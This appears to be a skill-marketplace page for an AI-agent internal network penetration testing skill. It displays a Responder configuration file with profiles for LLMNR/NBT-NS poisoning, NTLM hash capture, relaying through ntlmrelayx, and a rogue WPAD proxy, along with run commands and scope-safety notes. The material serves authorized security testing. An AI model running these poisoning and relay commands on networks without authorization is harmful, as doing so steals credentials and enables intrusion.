All skills
hardw00t avatar

/network-pentest

@f9bb3b2

Internal network and Active Directory penetration testing skill for corporate environments. Use when performing authorized internal network assessments, AD attack path analysis, lateral movement, privilege escalation, and post-exploitation across Windows/Linux estates. Covers BloodHound, Impacket, NetExec/CrackMapExec, Responder, Rubeus, mimikatz, certipy. Triggers on requests to pentest internal networks, attack AD, perform lateral movement, Kerberoast, DCSync, or escalate privileges.

Use this Skill: https://skilld.dev/gh/hardw00t/ai-security-arsenal/network-pentest

This session only. Nothing lands on disk.

payloadsresponder_config.md

≈579 tokens on demand. Your agent reads this file only when SKILL.md points to it.

Responder Configuration Templates

Three recommended Responder.conf profiles for different engagement modes. The file lives at /usr/share/responder/Responder.conf on most installs.

Profile 1: Hash capture only (safe default)

Listens for LLMNR/NBT-NS/mDNS queries, serves rogue responses, captures NTLMv2. Does NOT attempt relay; hashes land in the Responder log.

[Responder Core]
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
MQTT = On
DCERPC = On

Challenge = 1122334455667788

[HTTP Server]
Serve-Always = Off
Serve-Exe = Off
Serve-Html = Off

Run: sudo responder -I <iface> -wdF

Profile 2: Relay-ready

Disable Responder's SMB and HTTP listeners so ntlmrelayx.py can bind to them. Capture on other protocols still.

[Responder Core]
SQL = On
SMB = Off
RDP = On
Kerberos = On
HTTP = Off
HTTPS = Off
DNS = On
LDAP = On
MQTT = On
DCERPC = On

Run in parallel:

sudo responder -I eth0 -wdF
sudo ntlmrelayx.py -tf relay_targets.txt -smb2support -socks

Profile 3: WPAD proxy

Serves a rogue WPAD configuration for authenticated HTTP capture.

[Responder Core]
HTTP = On
HTTPS = On
Serve-Always = On

[HTTP Server]
Serve-Always = On
Serve-Exe = Off
HtmlFilename = files/AccessDenied.html

[WPAD]
WPADScript = function FindProxyForURL(url, host){ if ((host == "localhost") || shExpMatch(host, "localhost.*") ||  (host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return 'PROXY ISAProxySrv:3141; DIRECT';}

Run: sudo responder -I eth0 -wdF --wpad

Generating a relay target list

# Hosts in scope with SMB signing NOT required (relay candidates)
nxc smb live.txt --gen-relay-list relay_targets.txt

# Cross-check against scope before relaying
comm -12 <(sort relay_targets.txt) <(sort scope_hosts.txt) > relay_safe.txt

Safety

  • Confirm scope allows poisoning — some customers restrict Responder to specific VLANs.
  • Never run Responder on an engagement VPN's shared segment; you will poison other consultants.
  • Kill-switch: pkill -f Responder.py leaves the listener sockets open briefly — verify with ss -lntp before re-running.

Source: SKILL.md on GitHub

1 alert16d4 checks · Risk SAFE
  • Gen Agent Trust Hub16d

    The network-pentest skill is a highly structured, well-documented resource designed for authorized internal network and Active Directory penetration testing workflows. It provides clear playbooks, references, and configuration templates for using industry-standard security tools. No malicious behaviors, obfuscation techniques, or unauthorized data exfiltration paths were detected.

  • Socket16d

    13 alerts: gptSecurity, gptAnomaly

  • Snyk16d

    Risk: LOW · No issues

  • Runlayer7mo

    1/1 file flagged

Signed by skilld at f9bb3b2. This ties the file your Agent reads to that commit on GitHub. It does not review the instructions.

Last checked against GitHub 2 months ago.

Steadyupdated 6 months ago

README badge

README badge for hardw00t/ai-security-arsenal/network-pentest